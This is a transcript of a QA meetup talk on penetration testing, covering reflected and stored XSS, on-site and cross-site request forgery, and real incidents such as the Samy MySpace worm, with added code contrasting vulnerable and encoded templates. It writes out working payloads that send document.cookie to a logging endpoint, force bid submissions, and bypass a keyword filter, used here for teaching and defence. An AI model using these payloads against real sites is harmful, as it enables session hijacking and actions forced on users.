This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

    VodQA3_PenetrationTesting_AmitDhakkad: Presentation Transcript

    • Amit Dhakad
      Application Developer
      Is considered a “survivor”
      Likes To Read About Black Magic & Illusions
    • What, why and how's of Penetration Testing
      - Amit Dhakad
    • What do I plan to cover?
      What is Penetration Testing?
      Cross-site scripting (XSS)
        What is it?
        Types of XSS: Reflective XSS, Stored XSS
      Request Forgery
        What is it?
        Types of Request Forgery: On-site request forgery, Cross-site request forgery
      Attack mechanisms
      Real world examples
      Why do we need to pay attention?
    • Penetration Testing
      Simulating a malicious attack on a system
    • Cross-site scripting (XSS)
      Injecting JavaScript through user-controllable fields so that it runs in other users' browsers, inside the vulnerable site's origin
    • Reflective XSS
      Injecting JavaScript through URL parameters that the server echoes straight back into the response; the victim has to be lured into opening the crafted link
    • Diagram courtesy: The Web Application Hacker’s Handbook
    • Attack: http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)
      The query value is echoed into a double-quoted attribute; the stray " closes it and the rest becomes an onclick handler that sends document.cookie to the attacker's /log endpoint
    • Stored XSS
      Exploiting the server's ability to persist: the payload is saved (here, as a profile image URL) and served to every user who later views that page
    • Diagram courtesy: The Web Application Hacker’s Handbook
    • Attack: Image url is set to http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
      Same attribute break-out as before, but stored: the handler fires for every user who hovers over the image, and no crafted link is needed
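Both payloads above rely on one mistake: user-supplied text is placed inside a double-quoted HTML attribute without encoding, so a stray `"` closes the attribute and whatever follows becomes a new attribute. The following is an added example, not code from the talk or its demo application; the template markup, function names and the detection heuristic are assumed for the illustration, and only the two payload strings come from the slides.

```javascript
// Added example, not from the talk or its demo app: the two payloads above work
// because untrusted text is dropped into a double-quoted HTML attribute without
// encoding. A minimal template with that bug sits next to a fixed one.
// Markup and function names are assumed for the illustration.

// Payloads copied from the slides, URL-decoded (%2B -> +).
const REFLECTED_PAYLOAD =
  'title"onclick="window.location.href=(\'http://localhost:3000/log?message=\'+document.cookie)';
const STORED_PAYLOAD =
  'http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=(\'http://localhost:3000/log?message=\'+document.cookie)';

// Vulnerable: the value is concatenated straight into the attribute.
function renderSearchVulnerable(query) {
  return `<input type="text" name="query" value="${query}">`;
}
function renderAvatarVulnerable(imageUrl) {
  return `<img src="${imageUrl}" alt="avatar">`;
}

// Encode the characters that can end an attribute value or open a new tag.
function encodeHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: identical markup, value encoded for the attribute context.
function renderSearchSafe(query) {
  return `<input type="text" name="query" value="${encodeHtmlAttribute(query)}">`;
}
function renderAvatarSafe(imageUrl) {
  return `<img src="${encodeHtmlAttribute(imageUrl)}" alt="avatar">`;
}

// Detection heuristic for this demo: did the rendered tag gain an on* event
// handler attribute the template never wrote? (A real test would parse the HTML.)
function hasInjectedHandler(html) {
  return /"\s*on\w+\s*=/i.test(html);
}

// Stand-alone run: reports which renderings carry an injected handler.
for (const [name, html] of [
  ['reflected, vulnerable', renderSearchVulnerable(REFLECTED_PAYLOAD)],
  ['reflected, encoded', renderSearchSafe(REFLECTED_PAYLOAD)],
  ['stored, vulnerable', renderAvatarVulnerable(STORED_PAYLOAD)],
  ['stored, encoded', renderAvatarSafe(STORED_PAYLOAD)],
]) {
  console.log(`${name}: injected handler = ${hasInjectedHandler(html)}`);
}
```

Encoding is per context: the same value needs a different encoder inside a `<script>` block or a CSS value, and for `src`/`href` attributes the URL scheme should be validated as well, since attribute encoding does nothing against a `javascript:` URL.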
    • Request Forgery
      Making the victim's browser perform actions the user never intended, riding on the user's own authenticated session
    • On-site Request Forgery (OSRF)
      The forged request is triggered from a page on the same domain, typically via injected HTML or script
    • Attack with XSS: Image url is set to http://www.myflorida.org.uk/images/disney_gif/Donald.gif" onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
      The injected handler finds the real bid form on the page, fills in an amount and submits it with the victim's session
    • Attack without XSS: Image url is set to /bids?bid[amount]=500&bid[auction_id]=1
      No script needed: the browser fetches the "image" with the victim's cookies attached, and a GET that changes state places the bid
    • Cross-site Request Forgery (CSRF)
      The forged request is triggered from a page on a different domain under the attacker's control
    • Same origin policy
      A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.
      A page residing on one domain can load a script from another domain and execute this within its own context.
      This is exactly what CSRF relies on: the attacker's page can send the request with the victim's cookies attached and never needs to read the response.
    • What can you do with XSS and Request Forgery?
      Session hijacking
      Performing arbitrary actions
      Disclosure of user data
    • Real world attacks
    • MySpace worm by Samy (XSS + OSRF)
      Bypassed all filters and added a script to his profile
      The script did two things:
        Added the visiting user as a friend
        Copied itself into the visiting user's profile
      Anyone visiting a newly infected profile was also added as Samy's friend
      Protection: MySpace stripped the word "onreadystatechange", which is needed to attach an XMLHttpRequest callback
      Attack (filter bypass): eval('xmlhttp.onread' + 'ystatechange = callback');
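The filter-versus-bypass pair above is worth running. The following is an added example, not code from the talk or from MySpace: it reproduces a keyword denylist of the kind the slide describes (the real MySpace filter is not on the page, so the stripping behaviour is assumed) and executes both a literal payload and the split payload from the slide against a stand-in `xmlhttp` object.

```javascript
// Added example, not from the talk: a keyword denylist of the kind described
// above, reproduced so the Samy bypass can be run. The filter, the stand-in
// xmlhttp object and the control payload are constructed for the demonstration.

const BLOCKED_WORDS = ['onreadystatechange']; // assumed: the word MySpace stripped

// Filter modelled on the slide: delete every occurrence of each blocked word.
function denylistFilter(source) {
  return BLOCKED_WORDS.reduce((out, word) => out.split(word).join(''), source);
}

// Control payload: the handler name written literally (what the filter expects).
const LITERAL_PAYLOAD = 'xmlhttp.onreadystatechange = callback;';

// Payload from the slide: the name is only assembled at run time, so no
// contiguous "onreadystatechange" exists in the source for the filter to find.
const SAMY_STYLE_PAYLOAD = "eval('xmlhttp.onread' + 'ystatechange = callback');";

// Pass the payload through the filter, then execute what survives against a
// stand-in xmlhttp object and report whether the handler got installed.
function runThroughFilter(payload) {
  const filtered = denylistFilter(payload);
  const xmlhttp = {};
  const callback = function () {};
  let error = null;
  try {
    // A direct eval inside the function body sees `xmlhttp` and `callback`.
    new Function('xmlhttp', 'callback', filtered)(xmlhttp, callback);
  } catch (e) {
    error = e.constructor.name; // 'SyntaxError' when the filter mangled the code
  }
  return {
    filtered,
    handlerInstalled: typeof xmlhttp.onreadystatechange === 'function',
    error,
  };
}

// Stand-alone run.
for (const [name, payload] of [['literal', LITERAL_PAYLOAD], ['split (Samy)', SAMY_STYLE_PAYLOAD]]) {
  const result = runThroughFilter(payload);
  console.log(`${name}: filtered="${result.filtered}" installed=${result.handlerInstalled} error=${result.error}`);
}
```

The literal payload is destroyed by the filter (what survives does not even parse), while the split payload passes through unchanged and installs the handler. Denylisting tokens in user-supplied markup is a losing race against string concatenation, character codes and alternate encodings; the fix is to keep user content out of script context altogether, by encoding it as data or by running it through an allow-list sanitizer that keeps only known-safe tags and attributes.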
    • eBay – discovered by Dave Armstrong (OSRF)
      Crafted URL set as an image URL
      An arbitrary bid was placed on behalf of each visiting user
    • Mikeyy Twitter worm (XSS + OSRF)
      Written by a 17-year-old
      -- "<script src="http://www.stalkdaily.com/ajax.js"></script>"
      Visiting a profile carrying the script infected the viewer
      Infected users began tweeting unwittingly, spreading the worm further
    • Gmail vulnerability – discovered by Petko Petkov (CSRF)
      A forged request added a mail filter forwarding all of the victim's email to the attacker's address
    • Why do we need to pay attention?
      The shift is towards attacking clients (browsers and their users) rather than servers
      Web technologies provide little protection by default
      These attacks are dismissed as "lame", so they get little attention
      Identification using automated tools is difficult
      Penetration testing is treated as a separate vertical rather than part of everyday development and QA
    • Break your own walls before anyone else does it
    • Q & A
    • Thank you